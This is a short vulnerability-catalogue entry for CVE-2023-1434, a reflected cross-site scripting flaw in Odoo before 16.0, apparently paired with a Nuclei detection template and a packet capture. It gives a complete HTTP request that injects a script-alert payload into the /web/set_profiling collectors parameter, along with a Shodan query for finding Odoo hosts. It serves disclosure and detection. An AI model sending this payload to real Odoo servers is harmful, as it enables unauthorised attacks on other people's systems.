| Title | Odoo - Cross-Site Scripting |
|---|---|
| Author | DhiyaneshDK |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. |
| Remediation | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. |
| CVE ID | CVE-2023-1434 |
| CWE ID | CWE-79 |
| Shodan Query | title:"Odoo" |
| Tags | cve2023 cve odoo xss vkev vuln |
Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
GET /web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script> HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.3 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-1434.yaml
🦈 Packet Capture: ⬇️ Download cve-2023-1434.pcap
N/AN/A